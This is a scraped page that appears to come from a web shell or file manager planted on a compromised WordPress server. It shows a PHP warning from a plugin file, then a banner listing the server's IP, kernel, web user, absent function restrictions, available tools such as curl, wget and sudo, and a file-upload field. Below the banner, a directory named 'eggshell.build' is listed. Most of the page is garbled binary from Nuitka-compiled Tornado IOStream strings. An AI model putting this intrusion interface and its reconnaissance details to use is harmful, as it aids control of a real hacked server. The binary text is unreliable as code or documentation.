Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /nuitka/eggshell.build/ |
Upload File : |
��
� __class__�.�� �__init__�.�� �Stream is closed���.�� �
real_error�.�� �collections�.�� �deque�.�� �_buffers�.�K .�� �
_first_pos�.�� �_size�.�� �_large_buf_threshold�.��
�append�.�� �data�.�� J����.��* �&too many values to unpack (expected 2)�.�� �b�.��\ �X
Append the given piece of data (should be a buffer-compatible object).
�.�� C ���.��
�typing�.�� �cast�.��u �q
Get a view over at most ``size`` bytes (possibly fewer) at the
current buffer position.
�.�� �self�.�� �buffers�.�� �size�.�� �pos�.�� �popleft�.�K.��L �H
Advance the current buffer position by ``size`` bytes.
�.��
�ioloop�.��
�IOLoop�.�� �current�.�� �io_loop�.�� J @.�� �max_buffer_size�.�� �min�.�� J .�� �read_chunk_size�.�� �max_write_buffer_size�.�� �error�.��
� .�� �_read_buffer�.�� �_read_buffer_pos�.�� �_read_buffer_size�.�� �_user_read_buffer�.�� �_after_user_read_buffer�.�� �
_StreamBuffer�.�� �
_write_buffer�.�� �_total_write_index�.�� �_total_write_done_index�.�� �_read_delimiter�.�� �_read_regex�.�� �_read_max_bytes�.�� �_read_bytes�.�� �
_read_partial�.�� �_read_until_close�.�� �_read_future�.�� �_write_futures�.�� �_close_callback�.�� �_connect_future�.�� �_ssl_connect_future�.�� �_connecting�.��
�_state�.�� �_closed�.��� X� `BaseIOStream` constructor.
:arg max_buffer_size: Maximum amount of incoming data to buffer;
defaults to 100MB.
:arg read_chunk_size: Amount of data to read at one time from the
underlying transport; defaults to 64KB.
:arg max_write_buffer_size: Amount of outgoing data to buffer;
defaults to unlimited.
.. versionchanged:: 4.0
Add the ``max_write_buffer_size`` parameter. Changed default
``read_chunk_size`` to 64KB.
.. versionchanged:: 5.0
The ``io_loop`` argument (deprecated since version 4.1) has been
removed.
�.��0 �,Returns the file descriptor for this stream.�.��� ��Closes the file underlying this stream.
``close_fd`` is called by `BaseIOStream` and should not be called
elsewhere; other users should call `close` instead.
�.��m �iAttempts to write ``data`` to the underlying file.
Returns the number of bytes written.
�.��� X� Attempts to read from the underlying file.
Reads up to ``len(buf)`` bytes, storing them in the buffer.
Returns the number of bytes read. Returns None if there was
nothing to read (the socket returned `~errno.EWOULDBLOCK` or
equivalent), and zero on EOF.
.. versionchanged:: 5.0
Interface redesigned to take a buffer and return a number
of bytes instead of a freshly-allocated object.
�.�� �_start_read�.�� �re�.�� �compile�.�� �_try_inline_read�.�� �UnsatisfiableReadError�.�� �gen_log�.�� �info�.��. �*Unsatisfiable read, closing connection: %s�.�� �close�.�� �exc_info���.�� �add_done_callback�.�� �<lambda>�.��3 �/BaseIOStream.read_until_regex.<locals>.<lambda>�.��� X� Asynchronously read until we have matched the given regex.
The result includes the data that matches the regex and anything
that came before it.
If ``max_bytes`` is not None, the connection will be closed
if more than ``max_bytes`` bytes have been read and the regex is
not satisfied.
.. versionchanged:: 4.0
Added the ``max_bytes`` argument. The ``callback`` argument is
now optional and a `.Future` will be returned if it is omitted.
.. versionchanged:: 6.0
The ``callback`` argument was removed. Use the returned
`.Future` instead.
�.��
� exception�.��- �)BaseIOStream.read_until.<locals>.<lambda>�.��u Xn Asynchronously read until we have found the given delimiter.
The result includes all the data read including the delimiter.
If ``max_bytes`` is not None, the connection will be closed
if more than ``max_bytes`` bytes have been read and the delimiter
is not found.
.. versionchanged:: 4.0
Added the ``max_bytes`` argument. The ``callback`` argument is
now optional and a `.Future` will be returned if it is omitted.
.. versionchanged:: 6.0
The ``callback`` argument was removed. Use the returned
`.Future` instead.
�.�� �numbers�.�� �Integral�.��- �)BaseIOStream.read_bytes.<locals>.<lambda>�.��Q XJ Asynchronously read a number of bytes.
If ``partial`` is true, data is returned as soon as we have
any bytes to return (but never more than ``num_bytes``)
.. versionchanged:: 4.0
Added the ``partial`` argument. The callback argument is now
optional and a `.Future` will be returned if it is omitted.
.. versionchanged:: 6.0
The ``callback`` and ``streaming_callback`` arguments have
been removed. Use the returned `.Future` (and
``partial=True`` for ``streaming_callback``) instead.
�.�� �builtins��slice���NNN��R�.��, �(BaseIOStream.read_into.<locals>.<lambda>�.��� X� Asynchronously read a number of bytes.
``buf`` must be a writable buffer into which data will be read.
If ``partial`` is true, the callback is run as soon as any bytes
have been read. Otherwise, it is run when the ``buf`` has been
entirely filled with read data.
.. versionadded:: 5.0
.. versionchanged:: 6.0
The ``callback`` argument was removed. Use the returned
`.Future` instead.
�.��
�closed�.�� �_finish_read�.��3 �/BaseIOStream.read_until_close.<locals>.<lambda>�.��� X� Asynchronously reads all data from the socket until it is closed.
This will buffer all available data until ``max_buffer_size``
is reached. If flow control or cancellation are desired, use a
loop with `read_bytes(partial=True) <.read_bytes>` instead.
.. versionchanged:: 4.0
The callback argument is now optional and a `.Future` will
be returned if it is omitted.
.. versionchanged:: 6.0
The ``callback`` and ``streaming_callback`` arguments have
been removed. Use the returned `.Future` (and `read_bytes`
with ``partial=True`` for ``streaming_callback``) instead.
�.�� �
_check_closed�.�� �B���.�� �StreamBufferFullError�.��'